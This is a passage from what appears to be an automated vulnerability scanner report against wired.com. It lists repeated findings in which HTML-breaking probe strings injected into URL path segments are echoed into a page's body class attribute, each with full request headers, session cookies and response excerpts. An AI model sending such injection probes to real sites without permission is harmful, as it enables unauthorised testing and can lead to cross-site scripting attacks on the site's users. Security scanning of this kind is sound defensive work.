GET /science/discoveries7ddb8"><a>86307e83414/news/2009/02/dayintech_0205 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:45 GMT
Date: Sun, 21 Nov 2010 23:12:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7ddb8"><a>86307e83414 c_news">
...[SNIP]...

1.754. http://www.wired.com/science/discoveries/news/2009/02/dayintech_0205 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/02/dayintech_0205

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc7a4"><a>6eee09d380b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsfc7a4"><a>6eee09d380b/2009/02/dayintech_0205 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=560
Expires: Sun, 21 Nov 2010 23:22:15 GMT
Date: Sun, 21 Nov 2010 23:12:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsfc7a4"><a>6eee09d380b">
...[SNIP]...

1.755. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0319 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/03/dayintech_0319

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28940"><a>0a1b81a1697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science28940"><a>0a1b81a1697/discoveries/news/2009/03/dayintech_0319 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:16:24 GMT
Date: Sun, 21 Nov 2010 23:12:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science28940"><a>0a1b81a1697 ss_discoveries c_news">
...[SNIP]...

1.756. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0319 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/03/dayintech_0319

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832c9"><a>90caa4165d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries832c9"><a>90caa4165d3/news/2009/03/dayintech_0319 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=549
Expires: Sun, 21 Nov 2010 23:21:49 GMT
Date: Sun, 21 Nov 2010 23:12:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries832c9"><a>90caa4165d3 c_news">
...[SNIP]...

1.757. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0319 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/03/dayintech_0319

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4864a"><a>d516e68821c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news4864a"><a>d516e68821c/2009/03/dayintech_0319 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:51 GMT
Date: Sun, 21 Nov 2010 23:12:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news4864a"><a>d516e68821c">
...[SNIP]...

1.758. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0331 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/03/dayintech_0331

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88e90"><a>1b18fd01694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science88e90"><a>1b18fd01694/discoveries/news/2009/03/dayintech_0331 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Sun, 21 Nov 2010 23:16:03 GMT
Date: Sun, 21 Nov 2010 23:12:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science88e90"><a>1b18fd01694 ss_discoveries c_news">
...[SNIP]...

1.759. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0331 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/03/dayintech_0331

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e528a"><a>b36f778d09a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese528a"><a>b36f778d09a/news/2009/03/dayintech_0331 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:42 GMT
Date: Sun, 21 Nov 2010 23:12:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese528a"><a>b36f778d09a c_news">
...[SNIP]...

1.760. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0331 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/03/dayintech_0331

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa656"><a>9f2efb39a57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsaa656"><a>9f2efb39a57/2009/03/dayintech_0331 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:53 GMT
Date: Sun, 21 Nov 2010 23:12:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsaa656"><a>9f2efb39a57">
...[SNIP]...

1.761. http://www.wired.com/science/discoveries/news/2009/04/dayintech_0408 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/04/dayintech_0408

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27c21"><a>ee25f07f338 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science27c21"><a>ee25f07f338/discoveries/news/2009/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:16:30 GMT
Date: Sun, 21 Nov 2010 23:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science27c21"><a>ee25f07f338 ss_discoveries c_news">
...[SNIP]...

1.762. http://www.wired.com/science/discoveries/news/2009/04/dayintech_0408 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/04/dayintech_0408

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af11"><a>b64fd6bf37a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries1af11"><a>b64fd6bf37a/news/2009/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=590
Expires: Sun, 21 Nov 2010 23:22:35 GMT
Date: Sun, 21 Nov 2010 23:12:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries1af11"><a>b64fd6bf37a c_news">
...[SNIP]...

1.763. http://www.wired.com/science/discoveries/news/2009/04/dayintech_0408 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/04/dayintech_0408

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3001f"><a>f33ebe8dd11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news3001f"><a>f33ebe8dd11/2009/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=542
Expires: Sun, 21 Nov 2010 23:21:58 GMT
Date: Sun, 21 Nov 2010 23:12:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news3001f"><a>f33ebe8dd11">
...[SNIP]...

1.764. http://www.wired.com/science/planetearth [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/planetearth

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9af6"><a>58d5798a2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencea9af6"><a>58d5798a2e1/planetearth HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=216
Expires: Sun, 21 Nov 2010 23:12:53 GMT
Date: Sun, 21 Nov 2010 23:09:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencea9af6"><a>58d5798a2e1 ss_planetearth">
...[SNIP]...

1.765. http://www.wired.com/science/planetearth [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/planetearth

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d4aa"><a>dad91b2864b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/planetearth1d4aa"><a>dad91b2864b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=591
Expires: Sun, 21 Nov 2010 23:19:31 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_planetearth1d4aa"><a>dad91b2864b">
...[SNIP]...

1.766. http://www.wired.com/science/space [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/space

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfa3"><a>00c4df6c89f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science2dfa3"><a>00c4df6c89f/space HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29274
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Sun, 21 Nov 2010 23:13:00 GMT
Date: Sun, 21 Nov 2010 23:09:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2dfa3"><a>00c4df6c89f ss_space">
...[SNIP]...

1.767. http://www.wired.com/science/space [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/space

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e09"><a>ac805a603f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/space19e09"><a>ac805a603f2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29274
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:49 GMT
Date: Sun, 21 Nov 2010 23:09:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_space19e09"><a>ac805a603f2">
...[SNIP]...

1.768. http://www.wired.com/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd674"><a>362856281e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /searchcd674"><a>362856281e6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29325
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:13:49 GMT
Date: Mon, 22 Nov 2010 01:09:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_searchcd674"><a>362856281e6">
...[SNIP]...

1.769. http://www.wired.com/services/corrections/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/corrections/

Issue detail

